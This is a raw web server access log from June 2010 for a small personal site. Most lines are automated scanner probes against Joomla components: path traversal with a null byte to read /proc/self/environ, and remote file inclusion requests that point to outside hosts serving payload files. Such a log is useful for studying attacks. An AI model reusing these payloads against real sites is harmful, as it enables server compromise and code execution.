78.41.233.128 - - [28/Jun/2010:04:47:04 -0500] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.2.252.33 - - [28/Jun/2010:04:47:07 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:48:21 -0500] "GET /logs/access_log.1274400000//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:48:21 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:48:21 -0500] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.31.149.80 - - [28/Jun/2010:04:48:46 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:04:48:55 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
94.247.176.194 - - [28/Jun/2010:04:49:33 -0500] "GET /logs/access_log.1274400000//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:49:33 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:49:33 -0500] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:50:14 -0500] "GET /logs/access_log.1274400000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.55.41.132 - - [28/Jun/2010:04:53:13 -0500] "GET /?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
81.31.149.80 - - [28/Jun/2010:04:53:37 -0500] "GET /logs/access_log.1277164800//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:04:53:37 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:04:53:38 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
94.155.49.192 - - [28/Jun/2010:04:53:42 -0500] "GET /logs/access_log.1276041600//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
94.155.49.192 - - [28/Jun/2010:04:53:43 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
94.155.49.192 - - [28/Jun/2010:04:53:44 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
81.31.149.80 - - [28/Jun/2010:04:53:59 -0500] "GET /logs/access_log.1276819200//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
94.155.49.192 - - [28/Jun/2010:04:53:59 -0500] "GET /logs/access_log.1275782400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
81.31.149.80 - - [28/Jun/2010:04:55:29 -0500] "GET /logs/access_log.1277164800//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:04:55:29 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:04:55:29 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
81.2.252.33 - - [28/Jun/2010:04:56:14 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
81.2.252.33 - - [28/Jun/2010:04:56:14 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.2.252.33 - - [28/Jun/2010:04:56:15 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.31.149.80 - - [28/Jun/2010:04:57:24 -0500] "GET /logs/access_log.1276819200//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
67.205.67.73 - - [28/Jun/2010:04:58:30 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
67.205.67.73 - - [28/Jun/2010:04:58:31 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
207.46.204.184 - - [28/Jun/2010:05:00:11 -0500] "GET /logs/access_log.1237420800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.7.108.242 - - [28/Jun/2010:05:03:03 -0500] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
66.249.71.237 - - [28/Jun/2010:05:03:06 -0500] "GET /logs/access_log.1273363200 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.118.96.160 - - [28/Jun/2010:05:03:46 -0500] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [28/Jun/2010:05:04:30 -0500] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.155.49.192 - - [28/Jun/2010:05:04:56 -0500] "GET /logs/access_log.1276473600//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
94.155.49.192 - - [28/Jun/2010:05:04:57 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
94.155.49.192 - - [28/Jun/2010:05:04:58 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
81.31.149.80 - - [28/Jun/2010:05:06:10 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:05:06:27 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:05:06:30 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:05:06:33 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
207.7.108.242 - - [28/Jun/2010:05:06:42 -0500] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
62.182.63.49 - - [28/Jun/2010:05:06:45 -0500] "GET /index.php?option=com_zimbcomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.31.149.80 - - [28/Jun/2010:05:06:48 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
66.249.71.237 - - [28/Jun/2010:05:08:00 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
81.2.252.33 - - [28/Jun/2010:05:08:56 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
81.2.252.33 - - [28/Jun/2010:05:08:56 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.2.252.33 - - [28/Jun/2010:05:08:57 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
207.7.108.242 - - [28/Jun/2010:05:09:43 -0500] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.31.149.80 - - [28/Jun/2010:05:09:44 -0500] "GET /logs/access_log.1276819200//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:05:09:44 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:05:09:44 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:05:10:18 -0500] "GET /logs/access_log.1277164800//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:05:10:18 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:05:10:18 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:05:12:01 -0500] "GET /logs/access_log.1277164800//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:05:12:02 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:05:12:02 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
69.162.118.240 - - [28/Jun/2010:05:12:02 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
81.31.149.80 - - [28/Jun/2010:05:12:09 -0500] "GET /logs/access_log.1276819200//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:05:12:31 -0500] "GET /logs/access_log.1276732800//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:05:12:56 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:05:12:56 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:05:12:57 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
208.115.111.248 - - [28/Jun/2010:05:13:40 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
81.31.149.80 - - [28/Jun/2010:05:14:03 -0500] "GET /logs/access_log.1277164800//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:05:14:03 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:05:14:03 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.250.252.241 - - [28/Jun/2010:05:14:10 -0500] "GET /logs/access_log.1218758400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.31.149.80 - - [28/Jun/2010:05:14:52 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
89.108.64.192 - - [28/Jun/2010:05:15:13 -0500] "GET /logs/access_log.1266710400///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.812"
89.108.64.192 - - [28/Jun/2010:05:15:14 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
89.108.64.192 - - [28/Jun/2010:05:15:14 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.812"
81.31.149.80 - - [28/Jun/2010:05:15:36 -0500] "GET /logs/access_log.1276732800//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
94.247.176.194 - - [28/Jun/2010:05:15:49 -0500] "GET /logs/access_log.1274400000//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:05:15:49 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:05:15:50 -0500] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.108.64.192 - - [28/Jun/2010:05:16:11 -0500] "GET /logs/access_log.1274832000///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.812"
69.162.118.240 - - [28/Jun/2010:05:16:56 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
69.162.118.240 - - [28/Jun/2010:05:16:56 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
69.162.118.240 - - [28/Jun/2010:05:16:56 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
75.54.148.101 - - [28/Jun/2010:05:18:14 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4"
75.54.148.101 - - [28/Jun/2010:05:18:15 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4"
75.54.148.101 - - [28/Jun/2010:05:18:16 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4"
75.54.148.101 - - [28/Jun/2010:05:18:18 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4"
75.54.148.101 - - [28/Jun/2010:05:18:18 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4"
75.54.148.101 - - [28/Jun/2010:05:18:18 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4"
75.54.148.101 - - [28/Jun/2010:05:18:18 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4"
75.54.148.101 - - [28/Jun/2010:05:18:18 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4"
75.54.148.101 - - [28/Jun/2010:05:18:18 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4"
75.54.148.101 - - [28/Jun/2010:05:18:18 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4"
75.54.148.101 - - [28/Jun/2010:05:18:18 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4"
75.54.148.101 - - [28/Jun/2010:05:18:18 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4"
75.54.148.101 - - [28/Jun/2010:05:18:18 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4"
75.54.148.101 - - [28/Jun/2010:05:18:18 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4"
75.54.148.101 - - [28/Jun/2010:05:18:19 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4"
200.202.243.41 - - [28/Jun/2010:05:18:24 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
69.162.118.240 - - [28/Jun/2010:05:18:32 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
207.7.108.242 - - [28/Jun/2010:05:20:04 -0500] "GET /logs/access_log.1276473600/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.242 - - [28/Jun/2010:05:20:04 -0500] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [28/Jun/2010:05:20:05 -0500] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
87.118.96.160 - - [28/Jun/2010:05:21:01 -0500] "GET /logs/access_log.1276473600/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.118.96.160 - - [28/Jun/2010:05:21:01 -0500] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.118.96.160 - - [28/Jun/2010:05:21:01 -0500] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
207.7.108.242 - - [28/Jun/2010:05:21:37 -0500] "GET /logs/access_log.1276473600/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.242 - - [28/Jun/2010:05:21:37 -0500] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [28/Jun/2010:05:21:37 -0500] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
218.145.71.241 - - [28/Jun/2010:05:23:24 -0500] "GET /firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
218.145.71.241 - - [28/Jun/2010:05:23:35 -0500] "GET /firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.108.64.192 - - [28/Jun/2010:05:25:55 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
207.46.194.45 - - [28/Jun/2010:05:27:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.45 - - [28/Jun/2010:05:27:12 -0500] "GET /artwork/ballerina-fish-music.jpg HTTP/1.1" 200 34902 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
69.162.118.240 - - [28/Jun/2010:05:28:20 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
62.182.63.49 - - [28/Jun/2010:05:28:20 -0500] "GET /logs/access_log.1276473600/index.php?option=com_zimbcomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.182.63.49 - - [28/Jun/2010:05:28:20 -0500] "GET /index.php?option=com_zimbcomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.182.63.49 - - [28/Jun/2010:05:28:20 -0500] "GET /logs/index.php?option=com_zimbcomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.7.108.242 - - [28/Jun/2010:05:28:42 -0500] "GET /logs/access_log.1276473600/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.242 - - [28/Jun/2010:05:28:42 -0500] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [28/Jun/2010:05:28:42 -0500] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
80.177.1.221 - - [28/Jun/2010:05:29:26 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 281 "-""libwww-perl/5.805"
200.202.243.41 - - [28/Jun/2010:05:30:23 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
200.202.243.41 - - [28/Jun/2010:05:30:24 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
200.202.243.41 - - [28/Jun/2010:05:30:24 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
67.205.67.73 - - [28/Jun/2010:05:33:45 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
67.205.67.73 - - [28/Jun/2010:05:33:45 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
200.202.243.41 - - [28/Jun/2010:05:34:22 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
62.43.194.164 - - [28/Jun/2010:05:37:31 -0500] "GET /logs/access_log.1266710400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dyesscreek.com/famtree/documents/ID-RFI.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
